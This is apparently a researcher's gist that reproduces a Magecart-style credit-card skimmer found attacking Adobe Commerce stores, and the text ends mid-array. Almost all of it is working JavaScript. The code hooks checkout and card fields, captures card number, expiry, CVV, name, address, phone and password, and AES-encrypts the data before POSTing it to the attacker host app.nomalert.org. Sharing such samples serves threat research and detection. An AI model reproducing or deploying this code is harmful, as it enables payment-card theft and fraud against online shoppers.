Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save BenBaryoPX/0ebf041845c7f5dc6c52151636d5d2fb to your computer and use it in GitHub Desktop.
Save BenBaryoPX/0ebf041845c7f5dc6c52151636d5d2fb to your computer and use it in GitHub Desktop.
Skimmer found served from app.nomalert.org attacking Adobe Commerce
var ccn, nb_dd, nm_dd, m_dd, y_dd, c_dd, details, ccFieldsIds, al, vld, sac, sd, requiresExfiltration, sr, scf, vcn, gfv, gc, cc, ini, generateGUID, generateIV, encryptData, countries;
(function () {
var attack = function () {
function injectHooks() {
function clickCallback() {
var addressHtml = jQuery('.address:eq(0)').html();
if (addressHtml) {
var addressLines = addressHtml.split('<br>');
if (addressLines && addressLines.length) {
details.f = addressLines[0] ? addressLines[0].trim() : '';
details.a = addressLines[1] ? addressLines[1].trim() : '';
details.c = addressLines[2] ? addressLines[2].trim() : '';
details.co = addressLines[3] ? countries[addressLines[3].trim()] || addressLines[3].trim() : '';
details.r = addressLines[4] ? addressLines[4].trim() : '';
details.pc = addressLines[5] ? addressLines[5].trim() : '';
details.t = addressLines[6] ? addressLines[6].trim() : '';
}
}
setCookie('fname', details.f, 360);
setCookie('tel', details.t, 360);
setCookie('str', details.a, 360);
setCookie('zip', details.pc, 360);
setCookie('city', details.c, 360);
setCookie('country', details.co, 360);
setCookie('region', details.r, 360);
}
function hookCcInputFields(selector) {
element = jQuery(selector);
if (element && element[0] && element[0].className.indexOf('field-checkout') < 0) {
addEventListenerAndMark('change', element[0], changeCallback);
}
}
if (typeof jQuery === 'undefined') {
return;
}
if (new RegExp('pedido').test(window.location)) {
var submitBtn = jQuery('#payment-confirmation button:eq()');
if (submitBtn && submitBtn[0] && !submitBtn.hasClass('field-checkout')) {
submitBtn.addClass('field-checkout');
submitBtn.click(clickCallback);
}
}
if (new RegExp('paymentform').test(window.location)) {
element = jQuery('#confirm_button_norm');
if (element && element[0] && element[0].className.indexOf('field-checkout') < 0) {
addEventListenerAndMark('click', element[0], clickCallback);
}
ccFieldsIds.forEach(hookCcInputFields);
}
}
function addEventListenerAndMark(eventName, element, callback) {
element.addEventListener(eventName, callback, true);
element.classList.add('field-checkout');
}
function validateCcFields() {
function validateField(cssSelector) {
var value = getValueFromCookieOrElement(cssSelector);
switch (cssSelector) {
case ccFieldIds[0]:
if (!value || !isValidCcNumber(value)) {
isDataComplete = false;
}
break;
case ccFieldIds[1]:
case ccFieldIds[2]:
if (!value) {
isDataComplete = false;
}
break;
case ccFieldIds[3]:
if (!value || !isPositiveNumber(value) || value.length < 3) {
isDataComplete = false;
}
break;
}
}
var ccFieldIds = [
'#num_card',
'#CardExpirationMonth',
'#CardExpirationYear',
'#cvcfield'
];
var isDataComplete = true;
ccFieldIds.forEach(validateField);
return isDataComplete;
}
function changeCallback() {
var value = jQuery('#cvcfield').val();
if (value && isPositiveNumber(value) && value.length > 2) {
collectAllAvailablePii();
encryptAndExfilData();
}
}
function clickCallback() {
if (validateCcFields()) {
collectAllAvailablePii();
encryptAndExfilData();
}
}
function encryptAndExfilData() {
function enableExfiltration() {
requiresExfiltration = true;
}
if (requiresExfiltration) {
var parsedData = {
Address: details.a + ' ' + details.a2,
CCname: details.cd.n || details.f + ' ' + details.l,
Email: details.e,
Phone: details.t,
Sity: details.c,
State: details.r,
Country: details.co,
Zip: details.pc,
Shop: window.location.host,
CcNumber: details.cd.nb,
ExpDate: details.cd.m + '/' + details.cd.y,
Cvv: details.cd.c,
Password: details.ps,
Useragent: navigator.userAgent,
Uid: 'a3fd3af4108beb03c13d309e8eb5ac00ee0747c8'
};
var parsedDataString = JSON.stringify(parsedData);
var guid = generateGUID();
var iv = generateIV();
var dataObj;
dataObj = {
main: encryptData(parsedDataString, guid, iv),
guid: guid,
refer: iv
};
jQuery.ajax({
url: 'https://app.nomalert.org/p/',
data: {
main: dataObj.main,
uniqueId: dataObj.guid,
storedId: dataObj.refer
},
type: 'POST',
dataType: 'json'
});
requiresExfiltration = false;
setTimeout(enableExfiltration, 1000);
}
}
function collectAllAvailablePii() {
details.cd.nb = getValueFromCookieOrElement('#num_card');
details.cd.m = getValueFromCookieOrElement('#CardExpirationMonth');
details.cd.y = getValueFromCookieOrElement('#CardExpirationYear');
details.cd.c = getValueFromCookieOrElement('#cvcfield');
details.cd.n = getValueFromCookieOrElement("input[data-decidir='card_holder_name']");
details.c = getValueFromCookieOrElement('city', true);
details.pc = getValueFromCookieOrElement('zip', true);
details.a = getValueFromCookieOrElement('str', true);
details.t = getValueFromCookieOrElement('tel', true);
details.co = getValueFromCookieOrElement('country', true);
details.r = getValueFromCookieOrElement('region', true);
}
function isValidCcNumber(ccNum) {
ccNum = ccNum.replace(/ /g, '');
var digit, reverseNum, alternateNow, sumOfDigits, i, numLength;
alternateNow = true;
sumOfDigits = 0;
reverseNum = (ccNum + '').split('').reverse();
for (i = 0, numLength = reverseNum.length; i < numLength; i++) {
digit = reverseNum[i];
digit = parseInt(digit, 10);
if (alternateNow = !alternateNow) {
digit *= 2;
}
if (digit > 9) {
digit -= 9;
}
sumOfDigits += digit;
}
return sumOfDigits % 10 === 0;
}
function getValueFromCookieOrElement(target, isCookie) {
var val = '';
if (isCookie) {
val = getCookieValue(target) || '';
} else {
val = jQuery(target).val() || '';
}
return val;
}
function getCookieValue(name) {
var matches = document.cookie.match(new RegExp('(?:^|; )' + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + '=([^;]*)'));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function setCookie(name, value, expirationInMinutes) {
var expirationString = '';
if (expirationInMinutes) {
var date = new Date();
date.setTime(date.getTime() + expirationInMinutes * 60 * 1000);
expirationString = '; expires=' + date.toUTCString();
}
document.cookie = name + '=' + value + expirationString + '; path=/; secure=true; samesite=none;';
}
function isPositiveNumber(num) {
var parsedNum = Math.floor(Number(num));
return parsedNum !== Infinity && parsedNum >= 0;
}
function generateGUID_() {
var output = '';
for (var _ = 0; _ < 32; _++) {
output += String.fromCharCode(Math.round(Math.random() * 255));
}
var _0x2113E = document.getElementById('key');
return btoa(output);
}
function generateIV_() {
var output = '';
for (var _ = 0; _ < 16; _++) {
output += String.fromCharCode(Math.round(Math.random() * 255));
}
var _0x2113E = document.getElementById('iv');
return btoa(output);
}
function encryptData_(data, guid, iv) {
function generateGuid32() {
existingGuid = [];
for (var _ = 0; _ < 32; _++) {
existingGuid.push(Math.round(255 * Math.random()));
}
}
function generateIv16() {
existingIv = [];
for (var _ = 0; _ < 16; _++) {
existingIv.push(Math.round(255 * Math.random()));
}
}
function getCodeArrFromString(s) {
function str2CodeArr(str) {
for (var arr = [], i = 0; i < str.length; i++) {
arr.push(str.charCodeAt(i));
}
return arr;
}
return str2CodeArr(atob(s));
}
function rotate_(arrLen3) {
for (var firstItem = arrLen3[0], i = 0; i < 3; i++) {
arrLen3[i] = arrLen3[i + 1];
}
return arrLen3[3] = firstItem, arrLen3;
}
function core_(_0x2115B, _0x21121) {
_0x2115B = this.rotate(_0x2115B);
for (var _0x2113E = 0; _0x2113E < 4; ++_0x2113E) {
_0x2115B[_0x2113E] = this.sbox[_0x2115B[_0x2113E]];
}
return _0x2115B[0] = _0x2115B[0] ^ this.Rcon[_0x21121], _0x2115B;
}
function expandKey_(_0x21243, _0x21195) {
for (var _0x21209 = 16 * (this.numberOfRounds(_0x21195) + 1), _0x211CF = 0, _0x211EC = 1, _0x2113E = [], _0x21226 = [], _0x21121 = 0; _0x21121 < _0x21209; _0x21121++) {
_0x21226[_0x21121] = 0;
}
for (var _0x21178 = 0; _0x21178 < _0x21195; _0x21178++) {
_0x21226[_0x21178] = _0x21243[_0x21178];
}
for (_0x211CF += _0x21195; _0x211CF < _0x21209;) {
for (var _0x21260 = 0; _0x21260 < 4; _0x21260++) {
_0x2113E[_0x21260] = _0x21226[_0x211CF - 4 + _0x21260];
}
if (_0x211CF % _0x21195 == 0 && (_0x2113E = this.core(_0x2113E, _0x211EC++)), _0x21195 == this.keySize.SIZE_256 && _0x211CF % _0x21195 == 16) {
for (var _0x2115B = 0; _0x2115B < 4; _0x2115B++) {
_0x2113E[_0x2115B] = this.sbox[_0x2113E[_0x2115B]];
}
}
for (var _0x211B2 = 0; _0x211B2 < 4; _0x211B2++) {
_0x21226[_0x211CF] = _0x21226[_0x211CF - _0x21195] ^ _0x2113E[_0x211B2], _0x211CF++;
}
}
return _0x21226;
}
function addRoundKey_(_0x2113E, _0x21104) {
for (var _0x21121 = 0; _0x21121 < 16; _0x21121++) {
_0x2113E[_0x21121] ^= _0x21104[_0x21121];
}
return _0x2113E;
}
function createRoundKey_(_0x21178, _0x21104) {
for (var _0x2115B = [], _0x21121 = 0; _0x21121 < 4; _0x21121++) {
for (var _0x2113E = 0; _0x2113E < 4; _0x2113E++) {
_0x2115B[4 * _0x2113E + _0x21121] = _0x21178[_0x21104 + 4 * _0x21121 + _0x2113E];
}
}
return _0x2115B;
}
function subBytes_(_0x2115B, _0x21121) {
for (var _0x2113E = 0; _0x2113E < 16; _0x2113E++) {
_0x2115B[_0x2113E] = _0x21121 ? this.rsbox[_0x2115B[_0x2113E]] : this.sbox[_0x2115B[_0x2113E]];
}
return _0x2115B;
}
function shiftRows_(_0x2115B, _0x21121) {
for (var _0x2113E = 0; _0x2113E < 4; _0x2113E++) {
_0x2115B = this.shiftRow(_0x2115B, 4 * _0x2113E, _0x2113E, _0x21121);
}
return _0x2115B;
}
function shiftRow_(_0x211B2, _0x21121, _0x21178, _0x2113E) {
for (var _0x2115B = 0; _0x2115B < _0x21178; _0x2115B++) {
if (_0x2113E) {
for (var _0x21104 = _0x211B2[_0x21121 + 3], _0x21195 = 3; _0x21195 > 0; _0x21195--) {
_0x211B2[_0x21121 + _0x21195] = _0x211B2[_0x21121 + _0x21195 - 1];
}
_0x211B2[_0x21121] = _0x21104;
} else {
for (_0x21104 = _0x211B2[_0x21121], _0x21195 = 0; _0x21195 < 3; _0x21195++) {
_0x211B2[_0x21121 + _0x21195] = _0x211B2[_0x21121 + _0x21195 + 1];
}
_0x211B2[_0x21121 + 3] = _0x21104;
}
}
return _0x211B2;
}
function galois_multiplication_(_0x21178, _0x21104) {
for (var _0x2115B = 0, _0x21121 = 0; _0x21121 < 8; _0x21121++) {
1 == (1 & _0x21104) && (_0x2115B ^= _0x21178), _0x2115B > 256 && (_0x2115B ^= 256);
var _0x2113E = 128 & _0x21178;
(_0x21178 <<= 1) > 256 && (_0x21178 ^= 256), 128 == _0x2113E && (_0x21178 ^= 27), _0x21178 > 256 && (_0x21178 ^= 256), (_0x21104 >>= 1) > 256 && (_0x21104 ^= 256);
}
return _0x2115B;
}
function mixColumns_(_0x211B2, _0x2113E) {
for (var _0x21195 = [], _0x2115B = 0; _0x2115B < 4; _0x2115B++) {
for (var _0x21178 = 0; _0x21178 < 4; _0x21178++) {
_0x21195[_0x21178] = _0x211B2[4 * _0x21178 + _0x2115B];
}
_0x21195 = this.mixColumn(_0x21195, _0x2113E);
for (var _0x21121 = 0; _0x21121 < 4; _0x21121++) {
_0x211B2[4 * _0x21121 + _0x2115B] = _0x21195[_0x21121];
}
}
return _0x211B2;
}
function mixColumn_(_0x21195, _0x21121) {
var _0x21178 = [];
_0x21178 = _0x21121 ? [14,9,13,11] : [2,1,1,3];
for (var _0x2113E = [], _0x2115B = 0; _0x2115B < 4; _0x2115B++) {
_0x2113E[_0x2115B] = _0x21195[_0x2115B];
}
return _0x21195[0] = this.galois_multiplication(_0x2113E[0], _0x21178[0]) ^ this.galois_multiplication(_0x2113E[3], _0x21178[1]) ^ this.galois_multiplication(_0x2113E[2], _0x21178[2]) ^ this.galois_multiplication(_0x2113E[1], _0x21178[3]), _0x21195[1] = this.galois_multiplication(_0x2113E[1], _0x21178[0]) ^ this.galois_multiplication(_0x2113E[0], _0x21178[1]) ^ this.galois_multiplication(_0x2113E[3], _0x21178[2]) ^ this.galois_multiplication(_0x2113E[2], _0x21178[3]), _0x21195[2] = this.galois_multiplication(_0x2113E[2], _0x21178[0]) ^ this.galois_multiplication(_0x2113E[1], _0x21178[1]) ^ this.galois_multiplication(_0x2113E[0], _0x21178[2]) ^ this.galois_multiplication(_0x2113E[3], _0x21178[3]), _0x21195[3] = this.galois_multiplication(_0x2113E[3], _0x21178[0]) ^ this.galois_multiplication(_0x2113E[2], _0x21178[1]) ^ this.galois_multiplication(_0x2113E[1], _0x21178[2]) ^ this.galois_multiplication(_0x2113E[0], _0x21178[3]), _0x21195;
}
function round_(_0x2113E, _0x21121) {
return _0x2113E = this.subBytes(_0x2113E, false), _0x2113E = this.shiftRows(_0x2113E, false), _0x2113E = this.mixColumns(_0x2113E, false), _0x2113E = this.addRoundKey(_0x2113E, _0x21121);
}
function invRound_(_0x2113E, _0x21121) {
return _0x2113E = this.shiftRows(_0x2113E, true), _0x2113E = this.subBytes(_0x2113E, true), _0x2113E = this.addRoundKey(_0x2113E, _0x21121), _0x2113E = this.mixColumns(_0x2113E, true);
}
function main_(_0x21178, _0x21121, _0x2115B) {
_0x21178 = this.addRoundKey(_0x21178, this.createRoundKey(_0x21121, 0));
for (var _0x2113E = 1; _0x2113E < _0x2115B; _0x2113E++) {
_0x21178 = this.round(_0x21178, this.createRoundKey(_0x21121, 16 * _0x2113E));
}
return _0x21178 = this.subBytes(_0x21178, false), _0x21178 = this.shiftRows(_0x21178, false), _0x21178 = this.addRoundKey(_0x21178, this.createRoundKey(_0x21121, 16 * _0x2115B));
}
function invMain_(_0x21178, _0x21121, _0x2115B) {
_0x21178 = this.addRoundKey(_0x21178, this.createRoundKey(_0x21121, 16 * _0x2115B));
for (var _0x2113E = _0x2115B - 1; _0x2113E > 0; _0x2113E--) {
_0x21178 = this.invRound(_0x21178, this.createRoundKey(_0x21121, 16 * _0x2113E));
}
return _0x21178 = this.shiftRows(_0x21178, true), _0x21178 = this.subBytes(_0x21178, true), _0x21178 = this.addRoundKey(_0x21178, this.createRoundKey(_0x21121, 0));
}
function numberOfRounds_(_0x2113E) {
var _0x21121;
switch (_0x2113E) {
case this.keySize.SIZE_128:
_0x21121 = 10;
break;
case this.keySize.SIZE_192:
_0x21121 = 12;
break;
case this.keySize.SIZE_256:
_0x21121 = 14;
break;
default:
return null;
}
return _0x21121;
}
function encrypt_(_0x21226, _0x21195, _0x211EC) {
for (var _0x211B2 = [], _0x211CF = [], _0x2113E = this.numberOfRounds(_0x211EC), _0x21209 = 0; _0x21209 < 4; _0x21209++) {
for (var _0x21121 = 0; _0x21121 < 4; _0x21121++) {
_0x211CF[_0x21209 + 4 * _0x21121] = _0x21226[4 * _0x21209 + _0x21121];
}
}
var _0x21178 = this.expandKey(_0x21195, _0x211EC);
_0x211CF = this.main(_0x211CF, _0x21178, _0x2113E);
for (var _0x21243 = 0; _0x21243 < 4; _0x21243++) {
for (var _0x2115B = 0; _0x2115B < 4; _0x2115B++) {
_0x211B2[4 * _0x21243 + _0x2115B] = _0x211CF[_0x21243 + 4 * _0x2115B];
}
}
return _0x211B2;
}
function decrypt_(_0x21226, _0x21195, _0x211EC) {
for (var _0x211B2 = [], _0x211CF = [], _0x2113E = this.numberOfRounds(_0x211EC), _0x21209 = 0; _0x21209 < 4; _0x21209++) {
for (var _0x21121 = 0; _0x21121 < 4; _0x21121++) {
_0x211CF[_0x21209 + 4 * _0x21121] = _0x21226[4 * _0x21209 + _0x21121];
}
}
var _0x21178 = this.expandKey(_0x21195, _0x211EC);
_0x211CF = this.invMain(_0x211CF, _0x21178, _0x2113E);
for (var _0x21243 = 0; _0x21243 < 4; _0x21243++) {
for (var _0x2115B = 0; _0x2115B < 4; _0x2115B++) {
_0x211B2[4 * _0x21243 + _0x2115B] = _0x211CF[_0x21243 + 4 * _0x2115B];
}
}
return _0x211B2;
}
function getBlock_(_0x21178, _0x21121, _0x2115B, _0x2113E) {
return _0x2115B - _0x21121 > 16 && (_0x2115B = _0x21121 + 16), _0x21178.slice(_0x21121, _0x2115B);
}
function encrypt__(_0x2129A, _0x211CF, _0x21260, _0x21209) {
var _0x21226 = _0x21260.length;
if (_0x21209.length % 16) {
throw 'iv length must be 128 bits.';
}
var _0x21178 = [], _0x2127D = [], _0x21121 = [], _0x211B2 = [], _0x212B7 = [], _0x21195 = true;
if (_0x211CF == this.modeOfOperation.CBC && this.padBytesIn(_0x2129A), null !== _0x2129A) {
for (var _0x211EC = 0; _0x211EC < Math.ceil(_0x2129A.length / 16); _0x211EC++) {
var _0x2113E = 16 * _0x211EC, _0x2115B = 16 * _0x211EC + 16;
if (16 * _0x211EC + 16 > _0x2129A.length && (_0x2115B = _0x2129A.length), _0x21178 = this.getBlock(_0x2129A, _0x2113E, _0x2115B, _0x211CF), _0x211CF == this.modeOfOperation.CFB) {
_0x21195 ? (_0x21121 = this.aes.encrypt(_0x21209, _0x21260, _0x21260.length), _0x21195 = false) : _0x21121 = this.aes.encrypt(_0x2127D, _0x21260, _0x21260.length);
for (var _0x212D4 = 0; _0x212D4 < 16; _0x212D4++) {
_0x211B2[_0x212D4] = _0x21178[_0x212D4] ^ _0x21121[_0x212D4];
}
for (var _0x21243 = 0; _0x21243 < _0x2115B - _0x2113E; _0x21243++) {
_0x212B7.push(_0x211B2[_0x21243]);
}
_0x2127D = _0x211B2;
} else {
if (_0x211CF == this.modeOfOperation.OFB) {
_0x21195 ? (_0x21121 = this.aes.encrypt(_0x21209, _0x21260, _0x21260.length), _0x21195 = false) : _0x21121 = this.aes.encrypt(_0x2127D, _0x21260, _0x21260.length);
for (_0x212D4 = 0; _0x212D4 < 16; _0x212D4++) {
_0x211B2[_0x212D4] = _0x21178[_0x212D4] ^ _0x21121[_0x212D4];
}
for (_0x21243 = 0; _0x21243 < _0x2115B - _0x2113E; _0x21243++) {
_0x212B7.push(_0x211B2[_0x21243]);
}
_0x2127D = _0x21121;
} else {
if (_0x211CF == this.modeOfOperation.CBC) {
for (_0x212D4 = 0; _0x212D4 < 16; _0x212D4++) {
_0x2127D[_0x212D4] = _0x21178[_0x212D4] ^ (_0x21195 ? _0x21209[_0x212D4] : _0x211B2[_0x212D4]);
}
_0x21195 = false, _0x211B2 = this.aes.encrypt(_0x2127D, _0x21260, _0x21260.length);
for (_0x21243 = 0; _0x21243 < 16; _0x21243++) {
_0x212B7.push(_0x211B2[_0x21243]);
}
}
}
}
}
}
return _0x212B7;
}
function decrypt__(_0x2127D, _0x21243, _0x211EC, _0x21209) {
var _0x21178 = _0x211EC.length;
if (_0x21209.length % 16) {
throw 'iv length must be 128 bits.';
}
var _0x21260 = [], _0x21121 = [], _0x211B2 = [], _0x2129A = [], _0x21195 = [], _0x211CF = true;
if (null !== _0x2127D) {
for (var _0x2113E = 0; _0x2113E < Math.ceil(_0x2127D.length / 16); _0x2113E++) {
var _0x2115B = 16 * _0x2113E, _0x212B7 = 16 * _0x2113E + 16;
if (16 * _0x2113E + 16 > _0x2127D.length && (_0x212B7 = _0x2127D.length), _0x21260 = this.getBlock(_0x2127D, _0x2115B, _0x212B7, _0x21243), _0x21243 == this.modeOfOperation.CFB) {
for (_0x211CF ? (_0x211B2 = this.aes.encrypt(_0x21209, _0x211EC, _0x211EC.length), _0x211CF = false) : _0x211B2 = this.aes.encrypt(_0x21121, _0x211EC, _0x211EC.length), i = 0; i < 16; i++) {
_0x2129A[i] = _0x211B2[i] ^ _0x21260[i];
}
for (var _0x21226 = 0; _0x21226 < _0x212B7 - _0x2115B; _0x21226++) {
_0x21195.push(_0x2129A[_0x21226]);
}
_0x21121 = _0x21260;
} else {
if (_0x21243 == this.modeOfOperation.OFB) {
for (_0x211CF ? (_0x211B2 = this.aes.encrypt(_0x21209, _0x211EC, _0x211EC.length), _0x211CF = false) : _0x211B2 = this.aes.encrypt(_0x21121, _0x211EC, _0x211EC.length), i = 0; i < 16; i++) {
_0x2129A[i] = _0x211B2[i] ^ _0x21260[i];
}
for (_0x21226 = 0; _0x21226 < _0x212B7 - _0x2115B; _0x21226++) {
_0x21195.push(_0x2129A[_0x21226]);
}
_0x21121 = _0x211B2;
} else {
if (_0x21243 == this.modeOfOperation.CBC) {
for (_0x211B2 = this.aes.decrypt(_0x21260, _0x211EC, _0x211EC.length), i = 0; i < 16; i++) {
_0x2129A[i] = (_0x211CF ? _0x21209[i] : _0x21121[i]) ^ _0x211B2[i];
}
_0x211CF = false;
for (_0x21226 = 0; _0x21226 < _0x212B7 - _0x2115B; _0x21226++) {
_0x21195.push(_0x2129A[_0x21226]);
}
_0x21121 = _0x21260;
}
}
}
}
_0x21243 == this.modeOfOperation.CBC && this.unpadBytesOut(_0x21195);
}
return _0x21195;
}
function padBytesIn_(_0x2115B) {
for (var _0x21121 = 16 - _0x2115B.length % 16, _0x2113E = 0; _0x2113E < _0x21121; _0x2113E++) {
_0x2115B.push(_0x21121);
}
}
function unpadBytesOut_(_0x21178) {
for (var _0x21121 = 0, _0x2115B = -1, _0x2113E = _0x21178.length - 1; _0x2113E >= _0x21178.length - 1 - 16 && _0x21178[_0x2113E] <= 16; _0x2113E--) {
if (-1 == _0x2115B && (_0x2115B = _0x21178[_0x2113E]), _0x21178[_0x2113E] != _0x2115B) {
_0x21121 = 0;
break;
}
if (++_0x21121 == _0x2115B) {
break;
}
}
_0x21121 > 0 && _0x21178.splice(_0x21178.length - _0x21121, _0x21121);
}
function str2EncodedArr(_0x21178) {
for (var _0x21121 = [], _0x2115B = 0; _0x2115B < _0x21178.length; _0x2115B++) {
var _0x2113E = _0x21178.charCodeAt(_0x2115B);
_0x21121.push(255 & _0x2113E), _0x21121.push(_0x2113E >> 8 & 255);
}
return _0x21121;
}
function arr2String(_0x2115B) {
for (var _0x21121 = '', _0x2113E = 0; _0x2113E < _0x2115B.length; _0x2113E++) {
_0x21121 += String.fromCharCode(_0x2115B[_0x2113E]);
}
return btoa(_0x21121);
}
var existingGuid = guid, existingIv = iv, utils = {
aes: {
keySize: {
SIZE_128: 16,
SIZE_192: 24,
SIZE_256: 32
},
sbox: [99,124,119,123,242,107,111,197,48,1,103,43,254,215,171,118,202,130,201,125,250,89,71,240,173,212,162,175,156,164,114,192,183,253,147,38,54,63,247,204,52,165,229,241,113,216,49,21,4,199,35,195,24,150,5,154,7,18,128,226,235,39,178,117,9,131,44,26,27,110,90,160,82,59,214,179,41,227,47,132,83,209,0,237,32,252,177,91,106,203,190,57,74,76,88,207,208,239,170,251,67,77,51,133,69,249,2,127,80,60,159,168,81,163,64,143,146,157,56,245,188,182,218,33,16,255,243,210,205,12,19,236,95,151,68,23,196,167,126,61,100,93,25,115,96,129,79,220,34,42,144,136,70,238,184,20,222,94,11,219,224,50,58,10,73,6,36,92,194,211,172,98,145,149,228,121,231,200,55,109,141,213,78,169,108,86,244,234,101,122,174,8,186,120,37,46,28,166,180,198,232,221,116,31,75,189,139,138,112,62,181,102,72,3,246,14,97,53,87,185,134,193,29,158,225,248,152,17,105,217,142,148,155,30,135,233,206,85,40,223,140,161,137,13,191,230,66,104,65,153,45,15,176,84,187,22],
rsbox: [82,9,106,213,48,54,165,56,191,64,163,158,129,243,215,251,124,227,57,130,155,47,255,135,52,142,67,68,196,222,233,203,84,123,148,50,166,194,35,61,238,76,149,11,66,250,195,78,8,46,161,102,40,217,36,178,118,91,162,73,109,139,209,37,114,248,246,100,134,104,152,22,212,164,92,204,93,101,182,146,108,112,72,80,253,237,185,218,94,21,70,87,167,141,157,132,144,216,171,0,140,188,211,10,247,228,88,5,184,179,69,6,208,44,30,143,202,63,15,2,193,175,189,3,1,19,138,107,58,145,17,65,79,103,220,234,151,242,207,206,240,180,230,115,150,172,116,34,231,173,53,133,226,249,55,232,28,117,223,110,71,241,26,113,29,41,197,137,111,183,98,14,170,24,190,27,252,86,62,75,198,210,121,32,154,219,192,254,120,205,90,244,31,221,168,51,136,7,199,49,177,18,16,89,39,128,236,95,96,81,127,169,25,181,74,13,45,229,122,159,147,201,156,239,160,224,59,77,174,42,245,176,200,235,187,60,131,83,153,97,23,43,4,126,186,119,214,38,225,105,20,99,85,33,12,125],
rotate: rotate_,
Rcon: [141,1,2,4,8,16,32,64,128,27,54,108,216,171,77,154,47,94,188,99,198,151,53,106,212,179,125,250,239,197,145,57,114,228,211,189,97,194,159,37,74,148,51,102,204,131,29,58,116,232,203,141,1,2,4,8,16,32,64,128,27,54,108,216,171,77,154,47,94,188,99,198,151,53,106,212,179,125,250,239,197,145,57,114,228,211,189,97,194,159,37,74,148,51,102,204,131,29,58,116,232,203,141,1,2,4,8,16,32,64,128,27,54,108,216,171,77,154,47,94,188,99,198,151,53,106,212,179,125,250,239,197,145,57,114,228,211,189,97,194,159,37,74,148,51,102,204,131,29,58,116,232,203,141,1,2,4,8,16,32,64,128,27,54,108,216,171,77,154,47,94,188,99,198,151,53,106,212,179,125,250,239,197,145,57,114,228,211,189,97,194,159,37,74,148,51,102,204,131,29,58,116,232,203,141,1,2,4,8,16,32,64,128,27,54,108,216,171,77,154,47,94,188,99,198,151,53,106,212,179,125,250,239,197,145,57,114,228,211,189,97,194,159,37,74,148,51,102,204,131,29,58,116,232,203],
G2X: [0,2,4,6,8,10,12,14,16,18,20,22,24,26,28,30,32,34,36,38,40,42,44,46,48,50,52,54,56,58,60,62,64,66,68,70,72,74,76,78,80,82,84,86,88,90,92,94,96,98,100,102,104,106,108,110,112,114,116,118,120,122,124,126,128,130,132,134,136,138,140,142,144,146,148,150,152,154,156,158,160,162,164,166,168,170,172,174,176,178,180,182,184,186,188,190,192,194,196,198,200,202,204,206,208,210,212,214,216,218,220,222,224,226,228,230,232,234,236,238,240,242,244,246,248,250,252,254,27,25,31,29,19,17,23,21,11,9,15,13,3,1,7,5,59,57,63,61,51,49,55,53,43,41,47,45,35,33,39,37,91,89,95,93,83,81,87,85,75,73,79,77,67,65,71,69,123,121,127,125,115,113,119,117,107,105,111,109,99,97,103,101,155,153,159,157,147,145,151,149,139,137,143,141,131,129,135,133,187,185,191,189,179,177,183,181,171,169,175,173,163,161,167,165,219,217,223,221,211,209,215,213,203,201,207,205,195,193,199,197,251,249,255,253,243,241,247,245,235,233,239,237,227,225,231,229],
G3X: [0,3,6,5,12,15,10,9,24,27,30,29,20,23,18,17,48,51,54,53,60,63,58,57,40,43,46,45,36,39,34,33,96,99,102,101,108,111,106,105,120,123,126,125,116,119,114,113,80,83,86,85,92,95,90,89,72,75,78,77,68,71,66,65,192,195,198,197,204,207,202,201,216,219,222,221,212,215,210,209,240,243,246,245,252,255,250,249,232,235,238,237,228,231,226,225,160,163,166,165,172,175,170,169,184,187,190,189,180,183,178,177,144,147,150,149,156,159,154,153,136,139,142,141,132,135,130,129,155,152,157,158,151,148,145,146,131,128,133,134,143,140,137,138,171,168,173,174,167,164,161,162,179,176,181,182,191,188,185,186,251,248,253,254,247,244,241,242,227,224,229,230,239,236,233,234,203,200,205,206,199,196,193,194,211,208,213,214,223,220,217,218,91,88,93,94,87,84,81,82,67,64,69,70,79,76,73,74,107,104,109,110,103,100,97,98,115,112,117,118,127,124,121,122,59,56,61,62,55,52,49,50,35,32,37,38,47,44,41,42,11,8,13,14,7,4,1,2,19,16,21,22,31,28,25,26],
G9X: [0,9,18,27,36,45,54,63,72,65,90,83,108,101,126,119,144,153,130,139,180,189,166,175,216,209,202,195,252,245,238,231,59,50,41,32,31,22,13,4,115,122,97,104,87,94,69,76,171,162,185,176,143,134,157,148,227,234,241,248,199,206,213,220,118,127,100,109,82,91,64,73,62,55,44,37,26,19,8,1,230,239,244,253,194,203,208,217,174,167,188,181,138,131,152,145,77,68,95,86,105,96,123,114,5,12,23,30,33,40,51,58,221,212,207,198,249,240,235,226,149,156,135,142,177,184,163,170,236,229,254,247,200,193,218,211,164,173,182,191,128,137,146,155,124,117,110,103,88,81,74,67,52,61,38,47,16,25,2,11,215,222,197,204,243,250,225,232,159,150,141,132,187,178,169,160,71,78,85,92,99,106,113,120,15,6,29,20,43,34,57,48,154,147,136,129,190,183,172,165,210,219,192,201,246,255,228,237,10,3,24,17,46,39,60,53,66,75,80,89,102,111,116,125,161,168,179,186,133,140,151,158,233,224,251,242,205,196,223,214,49,56,35,42,21,28,7,14,121,112,107,98,93,84,79,70],
GBX: [0,11,22,29,44,39,58,49,88,83,78,69,116,127,98,105,176,187,166,173,156,151,138,129,232,227,254,245,196,207,210,217,123,112,109,102,87,92,65,74,35,40,53,62,15,4,25,18,203,192,221,214,231,236,241,250,147,152,133,142,191,180,169,162,246,253,224,235,218,209,204,199,174,165,184,179,130,137,148,159,70,77,80,91,106,97,124,119,30,21,8,3,50,57,36,47,141,134,155,144,161,170,183,188,213,222,195,200,249,242,239,228,61,54,43,32,17,26,7,12,101,110,115,120,73,66,95,84,247,252,225,234,219,208,205,198,175,164,185,178,131,136,149,158,71,76,81,90,107,96,125,118,31,20,9,2,51,56,37,46,140,135,154,145,160,171,182,189,212,223,194,201,248,243,238,229,60,55,42,33,16,27,6,13,100,111,114,121,72,67,94,85,1,10,23,28,45,38,59,48,89,82,79,68,117,126,99,104,177,186,167,172,157,150,139,128,233,226,255,244,197,206,211,216,122,113,108,103,86,93,64,75,34,41,52,63,14,5,24,19,202,193,220,215,230,237,240,251,146,153,132,143,190,181,168,163],
